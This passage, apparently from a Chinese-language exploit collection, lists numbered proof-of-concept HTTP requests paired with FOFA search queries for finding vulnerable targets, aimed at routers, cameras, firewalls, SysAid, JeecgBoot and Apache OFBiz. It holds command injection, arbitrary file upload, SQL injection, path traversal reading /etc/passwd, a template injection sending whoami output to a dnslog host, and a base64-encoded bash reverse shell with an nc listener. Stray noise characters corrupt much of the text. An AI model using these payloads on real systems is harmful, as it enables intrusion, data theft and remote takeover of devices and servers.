User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
8 u: z; K1 a: E4 k1 RConnection: close' x3 G1 k- \# k; ^( J2 a
Content-Length: 336! b: b" f# S5 R& L  q# b
Accept-Encoding: gzip
0 r- H, f# k+ k$ Z# U8 \Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l$ R, ^0 T: k& ^2 v, N) Q  q/ E+ O
& L, Y+ a1 d3 w: H/ k  U
------YsOxWxSvj1KyZow1PTsh98fdu6l
+ e) G- Z1 E3 I- M3 n1 D) TContent-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt", q3 w* R5 G1 _( Q/ U5 @
Content-Type: image/png
$ N9 y+ ], l8 d1 B8 b: z
. u( G/ _$ J& mYsOxWxSvj1KyZow1PTsh98fdu6l* B$ J. l4 r7 r+ p$ }* Y( e
------YsOxWxSvj1KyZow1PTsh98fdu6l
: d- a, H4 s1 s' VContent-Disposition: form-data; name="target"
3 i+ W0 U) M9 u3 t% h9 p! ^* C0 }; M0 r! [9 o) M
/Applications/SkillDevelopAndEHS/4 L' {# z2 R5 l/ W& Q. z
------YsOxWxSvj1KyZow1PTsh98fdu6l--
+ u  |4 o4 d& v9 Y. F
' g0 R7 [7 Q; t8 t+ q* k  d8 X) J2 l! e& x3 p
GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1, n2 q& [4 W, d7 }( i* T* M
Host: x.x.x.x
& m  Z3 t* p8 U7 n( S# Q6 p8 ]2 z" m9 ]2 O

( K# a; @6 Q4 O+ D79. BYTEVALUE 百为流控路由器远程命令执行) s0 R! O  G. _$ ^) `
FOFA:BYTEVALUE 智能流控路由器3 Q. r( i% L. m
GET /goform/webRead/open/?path=|id HTTP/1.1
  J/ R! J: p9 S$ O3 `( _. }6 IHost:IP: J& e7 o* A( ]6 o5 y7 g% Y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0# O* }8 v0 K* }5 K7 ~6 ~% O
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
$ D- t# @: ?# i5 G7 W/ B) ?Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
0 |* X( v& R/ l# ~' ~6 bAccept-Encoding: gzip, deflate$ ]2 v3 v  ]3 D9 i
Connection: close0 N6 Y1 m, b' `5 {; d, S
Upgrade-Insecure-Requests: 1
0 X+ [2 D7 L  H- A. H/ g, C* N# e! q5 ?, }

' l" Y. v& t, B80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传8 e4 J2 i5 T7 a
FOFA:app="速达软件-公司产品"
. q$ H, z4 [' q+ cPOST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1: j" z4 _; G6 g  W1 O  ?
Host: x.x.x.x$ ~: b2 |% _& p; X; K- z3 `9 P+ _
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
' I5 |3 k5 T/ p1 {- ~Content-Length: 27
( q& A8 H5 v' S9 U" KAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' g/ z, {- t' g3 D; @4 E
Accept-Encoding: gzip, deflate7 S/ v0 H7 S9 g3 |+ ?9 m
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
: a1 }1 B4 d7 {+ f- oConnection: close; \  n" L$ B' G4 q
Content-Type: application/octet-stream
! o6 b$ q% \3 L! w7 xUpgrade-Insecure-Requests: 12 L# u6 p) Z" Q( c+ h

! ~! ?  `4 P* q) h- `- Z4 e<% out.print("oessqeonylzaf");%>% D6 G8 b7 d9 B- q% u# Z1 n; _
1 D% U& ~5 e3 u* i9 O

& s+ {2 _, u0 e* X: x8 ?GET /xykqmfxpoas.jsp HTTP/1.16 n6 y% S, b+ N% c0 D& W1 t) |2 f
Host: x.x.x.x
4 G3 I" N) m) S! k2 I: bUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15* d$ ~1 x+ ]* x# i% ?2 y& I. c' g
Connection: close' {5 J+ P% H" _
Accept-Encoding: gzip
, u# @9 o: g. V7 b/ x% c* B2 j1 D& S9 a, |( q* n5 Y) B1 L

1 p) x0 d$ Q* U9 m  r4 M: _& f) v81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露8 ~4 v0 P* T1 N1 H! ?* W
FOFA:app="uniview-视频监控"
( F. ~, h! t9 r1 g) M& b& ~5 g% TGET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
  C2 y; S5 S- P/ A( V" U; r# B& ]Host: x.x.x.x
' V2 M) v* s* N! t% cUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
% I% P. Q- _8 \7 i) O. `Connection: close
2 n8 e) T+ _# E! Y* q+ p5 l. x+ YAccept-Encoding: gzip9 J# y% j: ^" M$ O. ~

! k% y0 `3 u4 G% `3 W  l, `- h1 B3 u5 x4 w" J. F
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行( S- Q( I9 T2 @$ O
FOFA:app="思福迪-LOGBASE"
* e5 h% W4 s7 a9 G) [! ~POST /bhost/test_qrcode_b HTTP/1.1
, S$ L+ R& G3 e9 x4 JHost: BaseURL
. ~- x4 _' y+ a: \' ^. `6 tUser-Agent: Go-http-client/1.14 O1 b" v4 P; X; J
Content-Length: 23# N1 n/ p  l. i
Accept-Encoding: gzip
5 r. B: b0 U# j6 `. y4 [/ QConnection: close1 f% g4 {4 F6 U& Y; H. R
Content-Type: application/x-www-form-urlencoded( d' Q$ @4 L; Z; S
Referer: BaseURL7 k, {/ b( h4 @
, m( E6 }5 s2 [0 l
z1=1&z2="|id;"&z3=bhost# Z! \9 i& I; r8 l. W3 I( J' j

, a9 u& E1 E. |1 R. t2 M! X* s' n8 I: _5 ]6 ^
83. JeecgBoot testConnection 远程命令执行
  w. B* a/ G& f2 n8 ^: @6 hFOFA:title=="JeecgBoot 企业级低代码平台"$ P' Y9 O5 N8 o) p8 o' T

4 {8 G! v! s: ]& N7 Q+ ]% l; W  Y0 K9 @/ i: K
POST /jmreport/testConnection HTTP/1.18 F0 ~! Z% ~, E' s1 v5 e" W; O: z
Host: x.x.x.x! C* B: p; o1 l7 M
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
9 t; X3 j8 \, nConnection: close2 t1 s0 K( q# z
Content-Length: 88814 H4 r& |$ X% S
Accept-Encoding: gzip" J0 E8 S* `' V# n
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
! a8 y* ?* @. Y' x1 L* t1 mContent-Type: application/json' {+ j& V" _" i2 x5 I

' j( x: f! b5 Q+ P5 I" ?6 aPAYLOAD2 `4 M; p+ s: D% E7 i! Z% r
7 C7 W: [' p& d7 ~0 P: m' E! w
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
$ v7 O  Y. j/ q4 _$ j+ J  w+ i4 lFOFA:title=="JeecgBoot 企业级低代码平台"' n: S. P# W8 t

' [2 U! o6 y* {4 D  A/ Y! v0 N* o% C; G
) d4 A1 t5 ?/ }/ ^
POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.10 \% R3 Z3 V8 l% M2 D
Host: 192.168.40.130:8080
( W" z* C0 y, M! eUser-Agent: curl/7.88.1
, D  n. x- f3 i5 }* rContent-Length: 156/ x6 m+ ~6 h4 k8 S/ [* j  V; s
Accept: */*" |6 d% _& N7 j8 b
Connection: close+ l1 a! d+ v) `4 U7 {: ?  |
Content-Type: application/json
4 m2 ^/ F$ f  dAccept-Encoding: gzip
7 o6 N% h2 J4 d! D7 r" J& s+ d% B( I+ [) H" r( ~
{0 h) m* `- [% W- ?4 S3 u' M
"sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
8 V# q2 l$ c% I/ b  "type": "0"1 S  H- ]; o' A; s
}" S4 q+ P/ j7 b- a# Z

2 m8 e. `6 Q( c+ T+ |! r- Y. K  B: O. ?/ v# Y
85. SysAid On-premise< 23.3.36远程代码执行
0 O) \' h) \& |! _CVE-2023-47246
3 H) E$ ^. l" N$ }FOFA:body="sysaid-logo-dark-green.png"
% z& o3 [* W2 p0 b2 i; vEXP数据包如下,注入哥斯拉马4 t: [* d" y4 U' f
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.14 }9 d, Q, e& X
Host: x.x.x.x5 `' w' {' A$ D  P2 i4 N
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
# y) l, L1 i# Q( ZContent-Type: application/octet-stream
0 z2 z7 _: z# p% jAccept-Encoding: gzip
6 ^4 L# t# e; c
/ O5 P9 z9 S$ X2 R7 ]0 CPAYLOAD
4 W8 h& h' u" m( k, c' J
9 a% n! z+ c; Q7 u: E回显URL:http://x.x.x.x/userfiles/index.jsp; _( Y7 y* `0 t

* @" Q6 r! ]& _" s2 L. P86. 日本tosei自助洗衣机RCE0 ~8 X6 A* O- F. _
FOFA:body="tosei_login_check.php"
; r4 h% @: l# ^+ {/ n1 L% \POST /cgi-bin/network_test.php HTTP/1.1
9 J7 \3 G/ u/ C# {$ uHost: x.x.x.x
+ j# K5 s1 L0 `User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
& x& ^) x* t! R; ], _  sConnection: close
0 E6 V$ [7 D, N0 }" qContent-Length: 44( ]+ P1 K0 B1 j. \
Accept: */*
' e+ T7 g5 Y6 Q  Y. M4 bAccept-Encoding: gzip: I: C0 {# W  N3 M
Accept-Language: en
; ^6 q) j' y" s9 e, UContent-Type: application/x-www-form-urlencoded( o3 @- _% f0 f" I; L" t1 R

6 H& V3 \# C! _/ Y, \( F5 H) @host=%0acat${IFS}/etc/passwd%0a&command=ping4 ^6 Z( t; t, @1 x6 m- Q: |

! N1 \/ V( ]( {. N2 d$ `  Y$ n: r2 ~3 F+ Y; S
87. 安恒明御安全网关aaa_local_web_preview文件上传
6 d5 F  W: B3 \FOFA:title="明御安全网关"
& A/ ?$ _1 K8 b/ K) {5 h# R  V3 hPOST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1( t: V- A% H0 ]+ A# C% Z
Host: X.X.X.X
4 t6 M+ }0 R8 @( }User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.151 g- [0 G/ C$ x+ N7 w7 s! w
Connection: close
& {4 U8 v& `% |  p9 W; lContent-Length: 198! {. e$ H8 q8 ]0 X% s
Accept-Encoding: gzip
8 Q6 s0 S/ r/ i8 @. M: I6 IContent-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd4 d+ x4 p, s. ]

/ @5 m( k- [% A# L7 u! Q: P; S/ c--qqobiandqgawlxodfiisporjwravxtvd
; Y; F1 g  }' J' L9 d+ jContent-Disposition: form-data; name="123"; filename="9B9Ccd.php"% v2 |3 d& s/ [+ G2 I% M
Content-Type: text/plain6 m* [: N. Y/ t( E3 O+ y" ~

/ N* o% [* k- m/ [3 a& D! h2ZqGNnsjzzU2GBBPyd8AIA7QlDq& e4 s3 b2 _9 G5 R
--qqobiandqgawlxodfiisporjwravxtvd--
9 a% r/ o) f5 a! H2 T0 p  e" G9 Y# r! a7 e6 V
* [6 O7 b8 M! l' J8 b
/jfhatuwe.php& o9 h+ n  u; J9 N6 m
5 m: N; c- i- [5 k7 Z- R9 i
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行1 ~# k, q+ e$ U% S1 K" X: ?6 M
FOFA:title="明御安全网关": r+ x0 p; R: J9 k2 A& `( B
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1, _/ I( a4 o. g7 G1 f
Host: x.x.x.xx.x.x.x0 z  t0 b% a) S
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.151 E: Y- X" @/ [& [* {
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
' Z; A' ~+ [& Y4 L- tAccept-Encoding: gzip, deflate
* n( @: V4 _% I! Y$ XAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.24 ~9 U7 G3 `8 p) [9 V+ ?
Connection: close
# g* D3 J0 i& ?$ y* E" N, i
1 R  d+ Y, K7 f! z3 p: [( M' K/ j5 y; X
/astdfkhl.php+ W& O9 D' X( h

0 H6 S# O3 l0 j' r% e89. 致远互联FE协作办公平台editflow_manager存在sql注入  o  U5 ?4 J/ v1 k1 D; C! l
FOFA:title="FE协作办公平台" || body="li_plugins_download"
" @) U) m0 x* g/ S) x# P. M$ ^$ KPOST /sysform/003/editflow_manager.js%70 HTTP/1.1- t( O4 T8 k# C: C
Host: x.x.x.x
5 l6 \. q" T7 d9 BUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15/ m! @4 c5 @: e
Connection: close+ Q* s/ K0 j+ m8 s% M2 b
Content-Length: 41
5 U. r1 `! L: W# O& c! Q+ dContent-Type: application/x-www-form-urlencoded
' M" k0 i9 G9 T. b- G, fAccept-Encoding: gzip
! Q" ^8 J. K0 J+ L; O, a# q; ^
9 D) s! Z* v5 l/ h2 koption=2&GUID=-1'+union+select+111*222--++ F! L* T3 p. d1 o. b& p( u" x

; j* f! E" ]( t# U+ U& N2 M# I1 H, a1 W6 O; m
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行/ F+ z& f5 v; v' H/ g0 U
FOFA:icon_hash="-1830859634"
, a0 ^9 r4 r7 ?) v# g! ]9 sPOST /php/ping.php HTTP/1.1- ?+ [* B4 w  X4 I$ j: K6 h7 `
Host: x.x.x.x+ g& _8 {* m# M2 G* I" Q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
; S" V, L7 @+ Q) f; T1 MContent-Length: 51
- Q/ I! c" b# k& X- G+ Q$ ~! WAccept: application/json, text/javascript, */*; q=0.018 H# J: k& h9 A
Accept-Encoding: gzip, deflate
/ d/ x; `. Z0 y" W* k0 mAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2. s: Q5 N+ q- k7 Y2 Q
Connection: close4 R% \" i$ C* c/ ~$ i. H
Content-Type: application/x-www-form-urlencoded9 [* p/ B4 L" \/ |
X-Requested-With: XMLHttpRequest) m& i2 I+ [9 G  [* s) \

. B  H; _% }: v. `# f) |jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig
, S6 s* w6 g5 a: G) d% @1 P  D9 M% ~1 U
4 d4 t( M- |8 H, c( F) r' U
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
0 }, }. @$ k6 e  MFOFA:title="综合安防管理平台"
# p) P+ F: W/ \1 e2 bGET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1/ Q9 y$ m% E+ j: q/ `
Host: your-ip
  ~! I( B; ^1 r2 }User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
$ S, I( j2 P/ ?) o# i: i& CAccept-Encoding: gzip, deflate
: W& _  A% Q+ _  [Accept: */*
) @) A6 M3 f6 a+ ]; @Connection: keep-alive9 u6 W# R* K7 a7 G. b9 r0 Y
: w3 ?3 Y$ y9 v1 @9 ^' K
# A, ~, ?7 f, @" |

1 i% P$ r. }: u& I. o/ o6 `- ^* M$ Q92. 海康威视运行管理中心session命令执行/ \) z4 ]$ m: K9 Z
Fastjson命令执行
4 K( f) i5 C6 X+ t. p3 a0 D8 Chunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"' \$ _7 @, T) @7 q0 r
POST /center/api/session HTTP/1.1
; o0 i9 _, ]6 \1 UHost:7 |2 ^$ P1 M9 b3 O
Accept: application/json, text/plain, */*
- P* Y& x" r  \/ ]( f8 O! o- _" e# }Accept-Encoding: gzip, deflate
, x/ l6 s7 C' o2 `; qX-Requested-With: XMLHttpRequest
' H1 K( D, c5 R5 W) }, [Content-Type: application/json;charset=UTF-8
) N7 v0 J( [) z/ \) z& XX-Language-Type: zh_CN
9 a2 a( h; |0 Z1 M9 oTestcmd: echo test* Q2 P2 P' ~/ c7 |, S) j
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36. |: P! t8 l9 ~8 ~. D( F7 W+ T, M2 H1 O
Accept-Language: zh-CN,zh;q=0.9
/ P% B8 Z4 Z. l8 iContent-Length: 5778
% ]& q1 ~5 U& F: E
. b. m' o+ X' J- B) |* s" `PAYLOAD, |8 L/ w" F* m7 a
. ~% ~2 M) I( k' C9 @2 |% w- j

% ^5 U5 O" p7 \& m- X* ^93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
. c0 \( q" O- @FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="6 T0 t, R3 Y' a) F9 t& \
POST /?g=app_av_import_save HTTP/1.1
1 z! L# ?7 A: ^) NHost: x.x.x.x
/ P" D% O5 Q1 k. V! n- YContent-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx4 W8 P1 W* e. e8 E( g
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
0 b( c$ y( `" D4 d5 @" z" }  t- n
$ m# O! `: z3 r------WebKitFormBoundarykcbkgdfx: [% B' M$ o$ X( G
Content-Disposition: form-data; name="MAX_FILE_SIZE"$ i# x0 r! t/ P
% e6 R3 s2 S; q7 m- e+ H) H1 O2 y+ \' |
100000000 `2 x2 K) h5 h7 }
------WebKitFormBoundarykcbkgdfx
. X* T$ s0 G1 B9 |" `1 }Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"6 t( U2 B/ W3 N
Content-Type: text/plain4 f2 N& W9 j5 ?' M
7 B! H7 r" q5 R4 D& @* U
wagletqrkwrddkthtulxsqrphulnknxa
. [  z" E4 R- R0 F# J------WebKitFormBoundarykcbkgdfx
$ u1 G# h; q7 M% BContent-Disposition: form-data; name="submit_post"
  g, V5 @- `7 o# z$ z( N3 a4 b
+ O" a' @( |& P7 a6 }/ Sobj_app_upfile
8 Z+ ^4 S# f( E3 v/ J5 A------WebKitFormBoundarykcbkgdfx- A+ J* g9 X, f, K
Content-Disposition: form-data; name="__hash__") W1 H% k' K* O* }6 y) o
' |1 a  f9 m5 v+ b6 N
0b9d6b1ab7479ab69d9f71b05e0e94456 k' a7 i5 i3 i2 M) V; D3 i8 P* o
------WebKitFormBoundarykcbkgdfx--
1 _4 q, ~' o# @- e: m  g
  e5 g% \$ h1 O/ o/ X) G3 a' v1 R
) W3 E& I5 U% y# _GET /attachements/xlskxknxa.txt HTTP/1.1
. S! o: q5 S) ]2 D0 Y6 ^Host: xx.xx.xx.xx
5 a) [5 v# b% T6 OUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
5 P2 t+ \  ^9 h: T: T) n0 [+ o+ s0 x' a% Q5 k. ?* m) \5 i& H
3 C6 v* x, U5 A% I2 E' M3 ~( \5 t. ]
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
4 C. |8 P) E. l! O7 w8 cFOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="5 A6 T7 c: T: ?) N4 s
POST /?g=obj_area_import_save HTTP/1.13 D0 ^( d& y3 c9 E
Host: x.x.x.x
. i+ x, L0 Y7 z. r) b, GContent-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
* [7 @+ {: E6 \+ kUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.366 Z9 n9 o- I" M3 g2 ~
# E9 k* E* Z( H: {; K% R
------WebKitFormBoundarybqvzqvmt9 o  z0 l' h( V5 ^
Content-Disposition: form-data; name="MAX_FILE_SIZE"+ c6 f/ X: z- N8 n' |1 s* O5 `

: C2 z6 l* b9 X6 ]! i2 l10000000* u! p. X7 q5 h. l4 z# A! I
------WebKitFormBoundarybqvzqvmt
: c. |( k/ A7 Z. ?, W) sContent-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
6 A, F* e' ]+ q0 l* }Content-Type: text/plain6 p: |1 ?9 U1 q1 {, O+ @- Y: ~

( z/ m5 b! R; {& Npxplitttsrjnyoafavcajwkvhxindhmu
2 ?" F2 ?! V( |" `7 ]) T2 Y' T------WebKitFormBoundarybqvzqvmt
7 u0 f, Z2 ~5 uContent-Disposition: form-data; name="submit_post"
+ K8 J% t* P4 K5 ]1 G8 v0 _/ \
' [) M* n& \+ iobj_app_upfile6 Z" A6 J  X- d1 J" y4 U4 f
------WebKitFormBoundarybqvzqvmt
+ [8 r" ?& r5 ?* }' O( r1 sContent-Disposition: form-data; name="__hash__"
" v* f8 Z- d( y% S' B/ g0 ]% |4 X/ i+ O+ v
0b9d6b1ab7479ab69d9f71b05e0e9445* j8 j' |8 h4 y3 @- O$ e8 l
------WebKitFormBoundarybqvzqvmt--" B0 M' W! O' ?' z

& k! `3 H' _/ N3 m9 ~% j8 {5 L8 r- S5 \, k4 h& x) i, a

6 L. C0 F; E+ K3 V2 K; B+ S: iGET /attachements/xlskxknxa.txt HTTP/1.1# ]8 s1 r/ s6 y8 g- g2 b
Host: xx.xx.xx.xx4 w& d4 g- d, P: S, m- M9 a8 M5 d
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
& g  S  t1 }$ x
# Z  h/ Y7 P/ m2 N
1 a8 ?( ?" `; _* U! O
& f8 V; q( H* d; M6 \95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行4 Z- k9 z! W/ S" H, x1 i
CVE-2023-49070; a2 W; B5 H  v' s1 S- q
FOFA:app="Apache_OFBiz"
9 Z9 F) P% N% B" o: S6 p8 OPOST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1/ L/ J" N6 E1 A7 m4 F# r+ Q
Host: x.x.x.x2 }5 e# m/ ?7 i0 `' ?4 ~. K
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
  s, n4 [7 b# D* |3 yConnection: close% `7 G; Y. ?  T5 j- `$ w. T$ S
Content-Length: 889- U6 }' L- T: o' n5 p
Content-Type: application/xml
1 u8 Z: v) a* sAccept-Encoding: gzip
3 l% J: R. F1 P# x( _
. R9 B, m% e# a# b' ?6 k/ d! j- M<?xml version="1.0"?>
. U( p( \5 F) V6 J<methodCall>7 J) o. _+ r0 _1 l, @' O, |
   <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>% T& i# Y( q$ D; {2 \
    <params>8 p9 |. q1 i1 I; O
      <param>
, [; ?- j" u+ Y# ]) T! c      <value>4 m) u1 j) e4 y
        <struct>2 _% M1 ?- z  o* c4 d# |9 O+ I
       <member>- h% l9 N7 B* f9 r7 g: p% F$ B$ f- f  D
          <name>test</name>
! l0 R  z  c% m- _; m          <value>
4 y/ [# J  Q6 c$ c      <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>
7 i( X+ w8 `8 h& Y1 l. p          </value>
0 T8 |4 M8 n: K( u% P* d        </member>% ~3 H$ U( {+ Z# K
      </struct>- z% B5 M# @0 _% T$ o" D
      </value>
# Y# F& Y+ p+ }/ \    </param>; r, p, K) L& O# \, R1 s
    </params># `0 V: |% v9 j2 [5 N) v
</methodCall>
1 N' P  a6 ^; F2 L2 S# j+ e6 Y7 }- K9 q$ q" J+ a0 `8 Z% e

; {! m# J, o' d. j6 Z用ysoserial生成payload
4 f' D6 d# v% s2 Y5 I/ r+ l2 o9 e/ tjava -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"' y8 _- [! r7 K& ~. ?  O

7 ~4 y3 G; g" {+ I0 `* m! U: |" A( i
: p2 \0 ]: i6 l% e将生成的payload替换到上面的POC
" K, _" o" ]9 u5 N  k1 H. J% `POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
1 c; d6 S% i. Q3 p9 p$ {% iHost: 192.168.40.130:8443( q! g5 g$ M+ \3 B9 Z3 g' t
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.368 W! L9 {! W1 a/ C0 U% f
Connection: close( T# ], ]6 q! l: E" s7 a3 y
Content-Length: 889& d) \- Y- x+ o& U, f4 V& ~, _
Content-Type: application/xml
# {& o+ l% m3 ?+ a) c7 @6 ]Accept-Encoding: gzip
6 K* F8 O+ Y3 W1 U' [8 k  F' N* X; |, v* V" ^
PAYLOAD
# }6 A2 n6 ?) ~4 X8 O$ ?& y- V+ ]% |2 G; Z
96. Apache OFBiz  18.12.11 groovy 远程代码执行( U" w$ J' C! e
FOFA:app="Apache_OFBiz"' U$ L: ?2 n, J  f
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
5 F1 K( o. m" \- S  x8 HHost: localhost:8443
* ~) M- F8 X% K! ]% p- k: lUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
' c& Z' l& p4 Y8 S! t2 ]Accept: */*
- G; Y: D# z4 o0 }Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2; q5 L! e8 S$ o- ^
Content-Type: application/x-www-form-urlencoded
. F. m6 c% W% D5 E" L2 _7 uContent-Length: 55
* Y3 U: g' o  Y- B; j
+ K& p( H' L+ [) [groovyProgram=throw+new+Exception('id'.execute().text);; {: T( o8 G( G1 g3 @/ ~

. ~# `  K( r6 a! F+ j
+ F& O/ Y+ |1 _' L2 Q, }% L反弹shell
7 r% n* k( L$ l- O! A在kali上启动一个监听* L( C8 Y) p$ ~. g, C
nc -lvp 7777
, E- [4 ?# i) o$ Y6 K5 V) z/ N1 i- x+ u) p9 b, [# s
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1+ u5 I8 J( @" A9 L  V
Host: 192.168.40.130:84430 c' l# o6 `# m4 q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
+ I2 Q- z6 r3 V7 X1 p: \Accept: */*: u: g) ^: Z+ s  ^
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.25 G' l* D$ y/ W3 O( W6 l
Content-Type: application/x-www-form-urlencoded
; a* }% N, A: s3 NContent-Length: 71
. |; v8 P6 U+ n  {+ C; N/ o1 m0 M5 y2 g. X3 C
groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();3 S$ v. Z: T. t
, p; N3 I+ |/ A' X" X1 I
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行; ~" ~. z% q+ Y
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"- t- k, C3 l- Z6 X5 G; z' A$ A
GET /passport/login/ HTTP/1.16 h) J  x) _, k, }5 @0 I# e
Host: 192.168.40.130:8085- _! V: v4 G, k, B  N
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
. s- ~) j+ c0 x) `1 A: FAccept-Encoding: gzip0 G, x6 N/ l8 b; _/ y
